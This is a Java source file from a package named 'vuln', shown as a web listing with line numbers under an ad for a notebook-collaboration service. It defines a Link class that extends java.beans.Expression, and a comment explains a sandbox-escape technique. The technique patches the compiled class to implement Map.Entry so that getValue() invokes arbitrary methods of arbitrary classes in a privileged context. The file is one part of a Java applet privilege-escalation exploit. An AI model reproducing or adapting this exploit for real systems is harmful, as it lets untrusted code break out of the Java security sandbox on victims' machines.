Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

1
package vuln;
2

3
import java.beans.Expression;
4
import java.util.Map;
5

6
/*
7
 * So if i understand this correctly...
8
 *
9
 * Normally this wouldn't work because a normal compiler won't allow us to
10
 * create a non-abstract class that doesn't fully implement an interface. To
11
 * get around this we create a dummy interface that only contains the method
12
 * we're interested in (in this case, getValue()) and modify the .class file
13
 * after compilation to implement Map$Entry instead of Test.
14
 *
15
 * Because of the compiler trickery above, Link now inherits getValue() from
16
 * Expression instead of from non-privileged applet code and can be used as a
17
 * Map.Entry.  Expression.getValue() calls Statement.invoke() using the
18
 * parameters we give it in the Exploit class, allowing us to call arbitrary
19
 * methods of arbitrary classes.  Since it started out in library code, and
20
 * since we didn't use any non-privileged methods, it runs in a privileged
21
 * context.  Whew.
22
 *
23
 */
24
public class Link extends Expression implements Test {
25

26
	Map.Entry entry;
27
	
28
	public Link(Object target, String methodName, Object[] arguments) {
29
		super(target, methodName, arguments);
30
	}
31

32
	public Object getKey() {
33
		return null;
34
	}
35

36
}
37

38